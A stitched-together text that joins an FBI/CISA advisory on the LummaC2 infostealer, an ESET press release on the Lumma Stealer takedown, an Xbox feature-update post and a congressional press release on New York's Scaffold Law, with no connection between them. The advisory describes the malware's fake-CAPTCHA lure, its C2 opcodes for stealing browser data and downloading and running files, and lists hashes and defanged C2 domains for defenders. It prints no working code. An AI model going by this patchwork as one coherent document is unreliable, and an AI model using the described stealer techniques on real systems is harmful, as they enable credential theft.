The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025.
The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of LummaC2 malware.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Technical Details
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for threat actor activity mapped to MITRE ATT&CK tactics and techniques.
Overview
LummaC2 malware first appeared for sale on multiple Russian-language speaking cybercriminal forums in 2022. Threat actors frequently use spearphishing hyperlinks and attachments to deploy LummaC2 malware payloads [T1566.001, T1566.002]. Additionally, threat actors rely on unsuspecting users to execute the payload by clicking a fake Completely Automated Public Turing Test to tell Computers and Humans Apart (CAPTCHA). The CAPTCHA contains instructions for users to then open the Windows Run window (Windows Button + R) and paste clipboard contents (“CTRL + V”). After users press “enter” a subsequent Base64-encoded PowerShell process is executed.
To obfuscate their operations, threat actors have embedded and distributed LummaC2 malware within spoofed or fake popular software (i.e., multimedia player or utility software) [T1036]. The malware’s obfuscation methods allow LummaC2 actors to bypass standard cybersecurity measures, such as Endpoint Detection and Response (EDR) solutions or antivirus programs, designed to flag common phishing attempts or drive-by downloads [T1027].
Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection [TA0010, T1119]. Private sector statistics indicate there were more than 21,000 market listings selling LummaC2 logs on multiple cybercriminal forums from April through June of 2024, a 71.7 percent increase from April through June of 2023.
File Execution
Upon execution, the LummaC2.exe file will enter its main routine, which includes four sub-routines (see Figure 1).
Figure 1. LummaC2 Main Routine
The first routine decrypts strings for a message box that is displayed to the user (see Figure 2).
Figure 2. Message Box
If the user selects No, the malware will exit. If the user selects Yes, the malware will move on to its next routine, which decrypts its callback Command and Control (C2) domains [T1140]. A list of observed domains is included in the Indicators of Compromise section.
After each domain is decoded, the implant will attempt a POST request [T1071.001] (see Figure 3).
Figure 3.PostRequest
If the POST request is successful, a pointer to the decoded domain string is saved in a global variable for later use in the main C2 routine used to retrieve JSON formatted commands (see Figure 4).
Figure 4. Code Saving Successful Callback Request
Once a valid C2 domain is contacted and saved, the malware moves on to the next routine, which queries the user’s name and computer name utilizing the Application Programming Interfaces (APIs) GetUserNameW and GetComputerNameW respectively [T1012]. The returned data is then hashed and compared against a hard-coded hash value (see Figure 5).
Figure 5. User and Computer Name Check
The hashing routine was not identified as a standard algorithm; however, it is a simple routine that converts a Unicode string to a 32-bit hexadecimal value.
If the username hash is equal to the value 0x56CF7626, then the computer name is queried. If the computer name queried is seven characters long, then the name is hashed and checked against the hard-coded value of 0xB09406C7. If both values match, a final subroutine will be called with a static value of the computer name hash as an argument. If this routine is reached, the process will terminate. This is most likely a failsafe to prevent the malware from running on the attacker’s system, as its algorithms are one-way only and will not reveal information on the details of the attacker’s own hostname and username.
If the username and hostname check function returns zero (does not match the hard-coded values), the malware will enter its main callback routine. The LummaC2 malware will contact the saved hostname from the previous check and send the following POST request (see Figure 6).
Figure 6. SecondPOSTRequest
The data returned from the C2 server is encrypted. Once decoded, the C2 data is in a JSON format and is parsed by the LummaC2 malware. The C2 uses the JSON configuration to parse its browser extensions and target lists using the ex key, which contains an array of objects (see Figure 7).
Figure 7. Parsing ofexJSON Value
Parsing the c key contains an array of objects, which will give the implant its C2 (see Figure 8).
Figure 8. Parsing ofcJSON Value
C2 Instructions
Each array object that contains the JSON key value of t will be evaluated as a command opcode, resulting in the C2 instructions in the subsections below.
1. Opcode0– Steal Data Generic
This command allows five fields to be defined when stealing data, offering the most flexibility. The Opcode O command option allows LummaC2 affiliates to add their custom information gathering details (see Table 1).
Table 2. Opcode1Options
Key
Value
p
Path to steal from
m
File extensions to read
z
Output directory to store stolen data
d
Depth of recursiveness
fs
Maximum file size
2. Opcode1– Steal Browser Data
This command only allows for two options: a path and the name of the output directory. This command, based on sample configuration downloads, is used for browser data theft for everything except Mozilla [T1217] (see Table 2).
Table 2. Opcode1Options
Key
Value
p
Path to steal from
z
Name of Browser – Output
3. Opcode2– Steal Browser Data (Mozilla)
This command is identical to Opcode 1; however, this option seems to be utilized solely for Mozilla browser data (see Table 3).
Table 3. Opcode2Options
Key
Value
p
Path to steal from
z
Name of Browser – Output
4. Opcode3– Download a File
This command contains three options: a URL, file extension, and execution type. The configuration can specify a remote file with u to download and create the extension specified in the ft key [T1105] (see Table 4).
Table 4. Opcode3Options
Key
Value
u
URL for Download
ft
File Extension
e
Execution Type
The e value can take two values: 0 or 1. This specifies how to execute the downloaded file either with the LoadLibrary API or via the command line with rundll32.exe [T1106] (see Table 5).
Table 5. Execution Types
Key
Value
e=0
Execute with LoadLibraryW()
e=1
Executive with rund1132.exe
5. Take Screenshot
If the configuration JSON file has a key of “se” and its value is “true,” the malware will take a screenshot in BMP format and upload it to the C2 server.
6. Delete Self
If the configuration JSON file has a key of “ad” and its value is “true,” the malware will enter a routine to delete itself.
The command shown in Figure 9 will be decoded and executed for self-deletion.
Figure 9. Self-Deletion Command Line
Figure 10 depicts the above command line during execution.
Figure 10. Decoded Command Line in Memory
Host Modifications
Without any C2 interactions, the LummaC2 malware does not create any files on the infected drive. It simply runs in memory, gathers system information, and exfiltrates it to the C2 server [T1082]. The commands returned from the C2 server could indicate that it drops additional files and/or saves data to files on the local hard drive. This is variable, as these commands come from the C2 server and are mutable.
Decrypted Strings
Below is a list of hard-coded decrypted strings located in the binary (see Figure 11).
Figure 11. Decoded Strings
Indicators of Compromise
See Table 6 and Table 7 for LummaC2 IOCs obtained by the FBI and trusted third parties.
Disclaimer: The authoring agencies recommend organizations investigate and vet these indicators of compromise prior to taking action, such as blocking.
Table 6. LummaC2 Executable Hashes
Executables
Type
4AFDC05708B8B39C82E60ABE3ACE55DB (LummaC2.exe from November 2023)
MD5
E05DF8EE759E2C955ACC8D8A47A08F42 (LummaC2.exe from November 2023)
MD5
C7610AE28655D6C1BCE88B5D09624FEF
MD5
1239288A5876C09D9F0A67BCFD645735168A7C80 (LummaC2.exe from November 2023)
SHA1
B66DA4280C6D72ADCC68330F6BD793DF56A853CB (LummaC2.exe from November 2023)
The following are domains observed deploying LummaC2 malware.
Disclaimer: The domains below are historical in nature and may not currently be malicious.
Pinkipinevazzey[.]pw
Fragnantbui[.]shop
Medicinebuckerrysa[.]pw
Musicallyageop[.]pw
stogeneratmns[.]shop
wallkedsleeoi[.]shop
Tirechinecarpet[.]pw
reinforcenh[.]shop
reliabledmwqj[.]shop
Musclefarelongea[.]pw
Forbidstow[.]site
gutterydhowi[.]shop
Fanlumpactiras[.]pw
Computeryrati[.]site
Contemteny[.]site
Ownerbuffersuperw[.]pw
Seallysl[.]site
Dilemmadu[.]site
Freckletropsao[.]pw
Opposezmny[.]site
Faulteyotk[.]site
Hemispheredodnkkl[.]pw
Goalyfeastz[.]site
Authorizev[.]site
ghostreedmnu[.]shop
Servicedny[.]site
blast-hubs[.]com
offensivedzvju[.]shop
friendseforever[.]help
blastikcn[.]com
vozmeatillu[.]shop
shiningrstars[.]help
penetratebatt[.]pw
drawzhotdog[.]shop
mercharena[.]biz
pasteflawwed[.]world
generalmills[.]pro
citywand[.]live
hoyoverse[.]blog
nestlecompany[.]pro
esccapewz[.]run
dsfljsdfjewf[.]info
naturewsounds[.]help
travewlio[.]shop
decreaserid[.]world
stormlegue[.]com
touvrlane[.]bet
governoagoal[.]pw
paleboreei[.]biz
calmingtefxtures[.]run
foresctwhispers[.]top
tracnquilforest[.]life
sighbtseeing[.]shop
advennture[.]top
collapimga[.]fun
holidamyup[.]today
pepperiop[.]digital
seizedsentec[.]online
triplooqp[.]world
easyfwdr[.]digital
strawpeasaen[.]fun
xayfarer[.]live
jrxsafer[.]top
quietswtreams[.]life
oreheatq[.]live
plantainklj[.]run
starrynsightsky[.]icu
castmaxw[.]run
puerrogfh[.]live
earthsymphzony[.]today
weldorae[.]digital
quavabvc[.]top
citydisco[.]bet
steelixr[.]live
furthert[.]run
featureccus[.]shop
smeltingt[.]run
targett[.]top
mrodularmall[.]top
ferromny[.]digital
ywmedici[.]top
jowinjoinery[.]icu
rodformi[.]run
legenassedk[.]top
htardwarehu[.]icu
metalsyo[.]digital
ironloxp[.]live
cjlaspcorne[.]icu
navstarx[.]shop
bugildbett[.]top
latchclan[.]shop
spacedbv[.]world
starcloc[.]bet
rambutanvcx[.]run
galxnetb[.]today
pomelohgj[.]top
scenarisacri[.]top
jawdedmirror[.]run
changeaie[.]top
lonfgshadow[.]live
liftally[.]top
nighetwhisper[.]top
salaccgfa[.]top
zestmodp[.]top
owlflright[.]digital
clarmodq[.]top
piratetwrath[.]run
hemispherexz[.]top
quilltayle[.]live
equatorf[.]run
latitudert[.]live
longitudde[.]digital
climatologfy[.]top
starofliught[.]top
MITRE ATT&CK Tactics and Techniques
See Table 8 through Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Threat actors used LummaC2 malware to exfiltrate sensitive user information, including traditional credentials, cryptocurrency wallets, browser extensions, and MFA details without immediate detection.
Threat actors used LummaC2 malware to download files with native OS APIs.
Mitigations
The FBI and CISA recommend organizations implement the mitigations below to reduce the risk of compromise by LummaC2 malware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections. These mitigations apply to all critical infrastructure organizations.
Separate User and Privileged Accounts: Allow only necessary users and applications access to the registry [CPG 2.E].
Monitor and detect suspicious behavior during exploitation [CPG 3.A].
Monitor and detect suspicious behavior, creation and termination events, and unusual and unexpected processes running.
Monitor API calls that may attempt to retrieve system information.
Analyze behavior patterns from process activities to identify anomalies.
Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
Log Collection: Regularly monitoring and reviewing registry changes and access logs can support detection of LummaC2 malware [CPG 2.T].
Implement authentication, authorization, and accounting (AAA) systems [M1018] to limit actions users can perform and review logs of user actions to detect unauthorized use and abuse. Apply principles of least privilege to user accounts and groups, allowing only the performance of authorized actions.
Audit user accounts and revoke credentials for departing employees, removing those that are inactive or unnecessary on a routine basis [CPG 2.D]. Limit the ability for user accounts to create additional accounts.
Keep systems up to date with regular updates, patches, hot fixes, and service packs that may minimize vulnerabilities. Learn more by visiting CISA’s webpage: Secure our World Update Software.
Secure network devices to restrict command line access.
Use segmentation to prevent access to sensitive systems and information, possibly with the use of Demilitarized Zone (DMZ) or virtual private cloud (VPC) instances to isolate systems [CPG 2.F].
Monitor and detect API usage, looking for unusual or malicious behavior.
Validate Security Controls
In addition to applying mitigations, the FBI and CISA recommend exercising, testing, and validating your organization’s security program against threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess performance against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Table 8 through Table 13).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Reporting
Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.
The FBI is interested in any information that can be shared, to include the status and scope of infection, estimated loss, date of infection, date detected, initial attack vector, and host- and network-based indicators.
To report information, please contact the FBI’s Internet Crime Complaint Center (IC3), your local FBI field office, or CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870.
Disclaimer
The information in this report is being provided “as is” for informational purposes only. The FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by the FBI and CISA.
ESET took part in a globally coordinated operation to disrupt Lumma Stealer.
The operation, led by Microsoft, targeted Lumma Stealer infrastructure, including all known C&C servers from the past year, making the botnet, in large part, inoperative.
Lumma Stealer has been one of the most prevalent infostealers over the past two years.
ESET provided both technical analysis and statistical information, and extracted essential data from tens of thousands of samples, as Lumma Stealer developers had been actively developing and maintaining the malware.
PRAGUE and BRATISLAVA, Slovakia, May 21, 2025 (GLOBE NEWSWIRE) — ESET has collaborated with Microsoft, BitSight, Lumen, Cloudflare, CleanDNS, and GMO Registry in a global disruption operation against Lumma Stealer, an infamous Malware-as-a-Service infostealer. The operation targeted Lumma Stealer infrastructure, specifically all known C&C servers of the past year, making the botnet, in large part, inoperative.
“ESET automated systems processed tens of thousands of Lumma Stealer samples, dissecting them to extract key elements, such as C&C servers and affiliate identifiers. This allowed us to continuously monitor Lumma Stealer’s activity, cluster affiliates, keep track of development updates, and more,” says ESET researcher Jakub Tomanek, who monitors and investigates Lumma Stealer. “Infostealer malware families, like Lumma Stealer, are typically just a foreshadowing of future, much more devastating attacks. Harvested credentials are a valued commodity in the cybercrime underworld, sold by initial access brokers to various other cybercriminals, including ransomware affiliates,” adds Tomanek. Lumma Stealer has been one of the most prevalent infostealers over the past two years, leaving no part of the world untouched.
Lumma Stealer developers had been actively developing and maintaining the malware. ESET has regularly spotted code updates ranging from minor bugfixes to complete replacement of string encryption and updates to the network protocol. The operators of the botnet also actively maintained the shared network infrastructure. Between 17 June 2024 and 1 May 2025, ESET observed a total of 3,353 unique C&C domains, with an approximate average of 74 new domains emerging each week, including occasional updates to Telegram-based dead drop resolvers. This ongoing evolution underscores the significant threat posed by Lumma Stealer and highlights the importance of the disruption efforts.
Lumma Stealer adopts the concept of malware as a service, where affiliates pay a monthly fee based on their tier to receive the latest malware builds and the network infrastructure necessary for data exfiltration. The tiered subscription model features price ranges from $250 to $1000 per month, each with increasingly sophisticated features. The operators of Lumma Stealer have also created a Telegram marketplace for affiliates, with a rating system to sell stolen data without intermediaries. Common distribution methods include phishing, cracked software, and other malware downloaders. Lumma Stealer employs a few, but effective, anti-emulation techniques that make analysis as complicated as possible. These techniques are designed to evade detection and hinder the efforts of security analysts.
Microsoft’s Digital Crimes Unit has facilitated the takedown, suspension, seizure, and blocking of the malicious domains that formed the backbone of Lumma Stealer’s infrastructure via a court order granted by the United States District Court of the Northern District of Georgia. In coordination, the U.S. Department of Justice simultaneously also seized the Lumma Stealer control panel, targeting the Lumma Stealer marketplace – and in turn the purchasers of Lumma Stealer malware. This was coordinated with Europol’s European Cybercrime Center (EC3) as well as Japan’s Cybercrime Control Center (JC3), which facilitated the suspension of locally based Lumma Stealer infrastructure.
“This global disruption operation was made possible by our long-term tracking of Lumma Stealer. The disruption operation led by Microsoft aimed to seize all known Lumma Stealer C&C domains, making the exfiltration infrastructure of Lumma Stealer non-functional. However, ESET will continue to track other infostealers while closely monitoring for Lumma Stealer activity following this disruption operation,” concludes Tomanek.
For an overview of the Lumma Stealer ecosystem and both a technical analysis and look at the evolution of Lumma Stealer’s key static and dynamic properties critical to the disruption effort, check out the latest ESET Research blogpost, “ESET takes part in global operation to disrupt Lumma Stealer” on WeLiveSecurity.com. Make sure to follow ESET Research on Twitter (today known as X), Bluesky, and Mastodon for the latest news from ESET Research.
Lumma Stealer detection rate based on ESET telemetry (data since July 2024)
About ESET ESET® provides cutting-edge digital security to prevent attacks before they happen. By combining the power of AI and human expertise, ESET stays ahead of emerging global cyberthreats, both known and unknown — securing businesses, critical infrastructure, and individuals. Whether it’s endpoint, cloud, or mobile protection, our AI-native, cloud-first solutions and services remain highly effective and easy to use. ESET technology includes robust detection and response, ultra-secure encryption, and multifactor authentication. With 24/7 real-time defense and strong local support, we keep users safe and businesses running without interruption. The ever-evolving digital landscape demands a progressive approach to security: ESET is committed to world-class research and powerful threat intelligence, backed by R&D centers and a strong global partner network. For more information, visit www.eset.com or follow our social media, podcasts, and blogs.
Headline: Xbox Game Pass members can now play Activision’s Retro Classics
We’re thrilled to announce the launch of Retro Classics, a collaboration between Xbox and Antstream Arcade, available to play for Game Pass members globally. Starting today, Game Pass members can dive into a collection of 50+ classic Activision games from the ’80s and ’90s, including beloved titles like Commando, Grand Prix, Kaboom!, Mech Warrior 2: 31st Century Combat, and Pitfall! This initiative is a step in our commitment to game preservation and backwards compatibility, allowing players to experience many timeless games on modern devices.
With Retro Classics, Game Pass members can expect a seamless gaming experience across console, PC, and on supported devices with cloud gaming. Whether playing on Xbox console, the Xbox app on PC, or streaming on supported LG and Samsung Smart TVs, Amazon Fire TV devices, and Meta Quest headsets, Retro Classics offers a versatile and accessible way to enjoy these nostalgic titles. Game Pass members can access Retro Classics through their Game Pass membership by searching and installing the feature via their console or on the Xbox app on PC. Additionally, players can take on friends, rivals, or the entire world with unique challenges. For the achievement hunters, there are some great new ones to collect, and for newer players, the ability to save and reload your progress, a first for many classic titles.
Retro Classics
Xbox Game Studios
☆☆☆☆☆
★★★★★
Discover timeless classics and hidden gems with Game Pass. Retro Classics includes over 50 restored and ready-to-play games available for Xbox Game Pass members. Power up your play with community challenges, competitive leaderboards, all-new challenge modes, high-score rankings and more. Play over 50 classic games from Activision like Commando, Grand Prix, Kaboom! Mech Warrior 2: 31st Century Combat, and Pitfall! . Take on friends, rivals or the entire world with unique challenges – or dive in solo – and collect achievements. Save your progress and continue later for the first time for many games. Available for Game Pass members to play on console, PC, and on supported devices with cloud gaming.
This launch is just the beginning. Game Pass members can look forward to discovering additional games added from Activision and Blizzard, expanding the Retro Classics collection to more than 100+ titles over time.
For more information on Retro Classics, see here.
PC Gaming
Game Bar Updates – Quick settings and widgets
To further enhance the gameplay experience with Game Bar, we’ve revamped the Settings widget with quick settings and continued visual updates to the remainder of the inbox widgets. The new quick settings will be accessible in both Compact Mode and Desktop Mode across all Windows devices.
Upon opening the Settings widget, players can now swiftly access a list of quick settings that allow them to adjust audio levels, screen brightness, show a virtual keyboard, turn on Compact Mode, manage connected devices and more, all while minimizing interruptions to gameplay.
In addition to this, visual updates have been applied to the Widget List, Gallery widget, and Home widget for a more unified look and feel across the experience.
Game Bar Updates – Microsoft Edge Game Assist
Microsoft Edge Game Assist is coming soon. As the first in-game browser built specifically for players, Game Assist brings players a full browser along with tips, walkthroughs, playlists, and sites like Discord, Spotify, and Twitch right into their game. Players can use the Windows + G shortcut to open this experience in Game Bar at any time during a gameplay session. As Game Assist is seamlessly connected to the Edge browser, players will have instant access to their favorites, passwords, history, and more, ensuring everything they need is always within reach and keeping their data synched between sessions.
GeForce Now update
Xbox players now have an additional option in the Xbox app on PC for playing via cloud gaming, providing even greater flexibility in how they play. GeForce Now has been added as an available option for PC gaming on participating titles, allowing players to choose their preferred streaming platform for gameplay. If a game is available on GeForce Now, players will see a pop-up when clicking the Play button on the product page, at which time they can select their preferred cloud gaming option.
Xbox Rewards
Rewards with Xbox – Xbox gift cards in custom amounts now available
Players can now redeem their Rewards points for Xbox gift cards in any amount on the Rewards hub.
To customize an Xbox gift card:
On the Rewards hub, go to the catalog and choose “Xbox Gift Card”
Select an amount from the drop-down list OR choose “Custom”
If selecting “Custom,” enter any amount between $5-$100
Select “Redeem Reward” to complete the redemption
Once complete, the gift card will be automatically added to your account balance
This balance can be used towards purchases of Games, Game Add-ons, Movies and TV Shows or on the latest deals at Xbox.com/Deals. Learn more about redeeming Rewards here.
Stream your own game – Over 100+ games
We’re continuing to add more games to the Stream your own game collection for Xbox Cloud Gaming (Beta). Game Pass Ultimate members can stream from a library of over 100+ cloud playable games on supported devices.
Recently added:
Arma Reforger
Deliver At All Cost
Monster Energy Supercross – The Official Videogame 6
Project Wingman
RIDE 5
ROADCRAFT
Coming soon:
Anno 1800 Console Edition – Standard
Disney Illusion Island
Hello Neighbor 2
Just Dance
Life is Strange: Before the Storm Episode 1
Life is Strange: True Colors
MONOPOLY
Skull and Bones
Sunderfolk
Watch Dogs Legion
Check out the full list of cloud-playable games available to stream on supported devices here. For more information, learn more here.
Xbox Play Anywhere – Buy once, play anywhere
With over 1,000 games now supporting Xbox Play Anywhere, players can seamlessly switch between PC, Xbox console, and supported handhelds at no additional cost, bringing even more value to our Xbox players. Progress, including saves, game add-ons, and achievements, is carried over wherever the game is played. Simply log in with an Xbox account on any device to continue playing from where you left off.
70+ games have been released with this feature so far in 2025! In April, these games came into the Xbox Play Anywhere collection:
Amaze!
Amerzone – The Explorer’s Legacy
Annie:Last Hope
Biz Builder Delux
Blue Prince
Cafe Master Story
Clair Obscur: Expedition 33
Crime Scene Cleaner
FragPunk
Hegzis
HexaScape: Cyber Defense
Hot Rod Mayhem
Light-It Up
Little Droid
Lunar Remastered Collection
Mandragora: Whispers of the Witch Tree
Meow Moments: Celebrating Geeks & Athletes
Moving Houses
My Little Universe
Ocean Keeper
Ruku’s Heart Balloon
Sky Revolver
South of Midnight
Spirit Valor
Tempopo
Terror Mansion
The Elder Scrolls IV: Oblivion Remastered
The Epyx Collection: Handheld
The Safe Place
Towerborne (Game Preview)
Check out the full list of available games that players can enjoy anywhere.
In Case You Missed It
Xbox Accessories – DOOM: The Dark Ages
As announced in April, the new limited-edition accessories collection for DOOM: The Dark Ages is now available for purchase. This collection celebrates DOOM and the latest chapter in the franchise’s storied history. The full lineup includes an Xbox Wireless Controller, an Xbox Elite Series 2, and an Xbox Series X console wrap. Visit xbox.com to learn more about this limited-edition collection.
Xbox Consoles –Dynamic Backgrounds
DOOM: The Dark Ages and Metaphor: ReFantazio introduced new dynamic backgrounds for Xbox Series X|S consoles, allowing players to customize their consoles to match exciting new games.
To learn how to customize your Xbox Series X|S console by choosing a dynamic background, visit the Xbox Support page.
Help Shape the Future of Xbox
Stay tuned to Xbox Wire for future updates and the latest and greatest Xbox news. For support related to Xbox updates, visit the official Xbox Support site.
We love hearing from the community, whether you have a suggestion for a new feature that you’d like to see added, or you want to give feedback on existing features that could use some improvement. We’re always looking for ways to improve Xbox experiences for players around the world. If you’d like to help create the future of Xbox and get early access to new features, join the Xbox Insider Program today by downloading the Xbox Insider Hub for Xbox Series X|S & Xbox One or Windows PC.
WASHINGTON, D.C. – Today, Congressman Nick Langworthy (NY-23) introduced the Infrastructure Expansion Act, which would reform New York’s antiquated liability law on federally funded projects, reduce taxpayer costs, and promote more construction and jobs in our state. This legislation will preempt state law and align New York with 49 other states which utilize a comparative negligence standard to assess fault when injuries occur on a construction site.
“This bill is urgently needed to preempt this broken liability standard on federally funded projects and get New York building again,”said Congressman Langworthy. “New York’s Scaffold Law is a gift to trial lawyers and a burden on our construction workers and taxpayers, and it must change.”
“It is estimated that the scaffold law increases total construction costs between 5 and 10%. This only in New York law, dating from 1885, doesn’t protect workers and unnecessarily increases the cost for building roads and bridges, hospitals, schools, affordable housing, industrial facilities, and office buildings.
“The last state to have such a law was Illinois which repealed its statute in 1995. Since Albany refuses to act, federal preemption is the only path to proceed. Enactment of this law will save at least $2 billion in federal tax dollars over the next 10 years and significant savings to state taxpayers.
“My hope is that this law if enacted will finally force Albany to reform this law, saving millions each year in construction costs to build schools, residential housing, and other projects which are not typically funded by Washington. Significant technology projects, such as Micron outside Syracuse and other projects all throughout New York State would see a reduced cost of construction,”continued Langworthy.
New York State’s outdated Scaffold Law imposes absolute liability on property owners and contractors for elevation-related injuries—regardless of a worker’s own negligence. This unique-to-New York mandate has made construction insurance skyrocket, driving up the cost of housing, schools, and infrastructure across the state. New York’s law has also resulted in significant fraud as staged accident suits have flooded the courts. This situation was recently documented in an ABC News national story on construction and legal fraud, most of which occur in New York State due to the scaffold law.
Original cosponsors of this legislation include Rep. Claudia Tenney (R-NY) and Rep. Elise Stefanik (R-NY).
“New York’s burdensome and misguided Scaffold Law has caused construction costs to skyrocket, making it one of most expensive states to build in the country. The Infrastructure Expansion Act will lower costs on federally funded projects by finally bringing fairness and balance to liability rules. This is a critical step toward bringing investments to our state and making New York more affordable and competitive,”said Congresswoman Tenney.
Groups that support this legislation include the American Council of Engineering Companies of New York, Associated Builders and Contractors of New York State, Associated General Contractors of New York, Associated General Contractors of New York State, Building Trades Employer Association, Business Council of New York State, Inc., Big “I” New York, General Contractors Association, General Contractors Association of New York, Lawsuit Reform Alliance of New York, Long Island Builders Institute, National Association of Home Builders, National Electrical Contractors Association, New York Association of Homebuilders, New York Association of Towns, New York State Association for Affordable Housing, New York State Builders Association, New York State Business Council, Partnership for New York City, Real Estate Board of New York, Upstate United, Habitat for Humanity, .
“This legislation is necessary for all future development projects in New York State because it addresses the biggest ongoing concern we hear from our businesses: affordability. New York is the only state with this kind of law, which mandates unnecessary provisions that only raise the cost of doing business. Congressman Langworthy’s bill is critical to ensure key economic development projects remain affordable, such as reconstructing Penn Station and bringing high-paying jobs and economic growth to Syracuse through Micron,”said Heather Mulligan, President and CEO, Business Council of New York State, Inc.
“New York is the most expensive city in America, with the high cost of construction being a major contributor. Local legislators have been unwilling to override special interests to deal with our affordability crisis. We support the legislation introduced by Representative Langworthy that promises to impose needed fiscal discipline that we cannot seem to achieve on our own,”said Kathryn Wylde, President and CEO, Partnership for New York City.
“This commonsense legislation replaces outdated absolute liability rules with a fair and modern comparative negligence standard for federally assisted construction projects. This long-overdue reform will help reduce fraud, lower insurance premiums, and establish a more balanced legal framework for both builders and workers.Escalating insurance costs threaten the viability of construction projects, drive up consumer costs, and delay critical development needed to address housing and infrastructure demands. This legislation is a necessary step toward restoring fairness and long-term sustainability in construction-related liability policies.We commend Congressman Langworthy for his leadership on this important issue and urge swift passage of this vital legislation,”said Mike Fazio, Executive Vice President, New York State Builders Association.
“The Long Island Builders Institute supports the Infrastructure Expansion Act of 2025. This bill replaces outdated absolute liability rules with a fair comparative negligence standard for federally assisted infrastructure and transportation projects.By preempting such state laws and standardizing liability rules, this legislation ensures a balanced legal framework that encourages participation in federally supported projects without compromising worker protections.We applaud Representative Langworthy’s leadership and urge Congress to pass this commonsense reform,”said Mike Florio, CEO, Long Island Builders Institute.
“The National Association of Home Builders commends Rep. Nick Langworthy (R-N.Y.) for introducing the Infrastructure Expansion Act. At a time when rising construction and insurance costs are driving up overall project expenses, this bill would help reduce costs and better use valuable taxpayer dollars by implementing reasonable and fair liability standards for certain federally funded projects,”said Buddy Hughes, Chairman, National Association of Home Builders.
“The Scaffold Law costs New Yorkers nearly $800 million a year without delivering any tangible construction safety benefits, and as a result, we are hindering the economic growth of our communities statewide, preventing safe development from moving forward and creating new jobs and new business opportunities,” said John T. Evers, President and CEO, American Council of Engineering Companies of New York (ACEC New York.) “New York needs reasonable regulations that eliminate unnecessary costs, and this bill does just that by removing the requirements for higher-rate insurance on projects that receive federal funding. With this proposed legislation, we can expand the size, scope and number of public works projects that are critical to improving the built environment around us, and we applaud the work of Congressman Nick Langworthy and his fellow lawmakers for their efforts to reverse this alarming trend.”
“We’re grateful that Congressman Langworthy has heard the concerns of New York’s contractor community. His legislation takes aim at decades of abuse caused by an outdated, New York-only law that has helped make us one of the most expensive places to build in the country. When passed, it will help bring insurance carriers back to New York and make general liability coverage more affordable—allowing us to build more housing and repair our roads and bridges. We look forward to working with the Congressman to get this much-needed legislation across the finish line,”said Brian Sampson, ABC Empire State Chapter President.
“The Scaffold Act is a costly mandate that places undue fiscal burdens on towns and their taxpayers when trying to complete projects in their respective communities. We need this commonsense reform that will lower costs, protect the taxpayers, and help spur more investments in our infrastructure and in economic development projects across the state,”said Christopher A Koetzle, Executive Director, New York Association of Towns.
“Upstate United applauds Congressman Langworthy for introducing federal legislation that would reform New York’s outdated and costly ‘Scaffold Law.’ Originally enacted in the 1880s—when worker protections were minimal—the law now imposes an absolute liability standard for gravity-related construction accidents, a policy unique to New York. As a result, our state faces the highest general liability insurance costs for construction in the nation, burdening taxpayers with hundreds of millions of dollars each year. This proposed legislation would eliminate the absolute liability standard for federally funded projects, helping to reduce unnecessary costs and support job growth. We hope to see this legislation advance in D.C. and call on New York’s leaders to pursue long-overdue reforms at the state level,”said Justin Wilcox, Upstate United.
“The Empire State will never resolve its affordable housing crisis, properly invest in public infrastructure and transportation, or attract and retain the industries of the future if the only-in-New York Scaffold Law continues to waste public funds on liability costs,”said Tom Stebbins, Executive Director, Lawsuit Reform Alliance of New York.“Congressman Langworthy’s bill is a step in the right direction. It protects taxpayers’ money from being siphoned from federal projects to pay for lawsuits that benefit no one except the personal injury lawyer lobby. Congress is taking note, when will Albany act?”
“One of the main drivers of the high cost of construction in New York City is our antiquated Scaffold Law, which serves to protect special interests rather than any jobsite the law purportedly makes safer. Rep. Langworthy’s bill takes this outdated law head on, and if passed will allow our city to focus resources on the projects that matter, rather than increased insurance premiums and lawsuit settlements. Driving costs down and making New York City more affordable requires bold action at all levels, and Rep. Langworthy’s proposed legislation is a strong step in the right direction,”said James Whelan, President, Real Estate Board of New York.
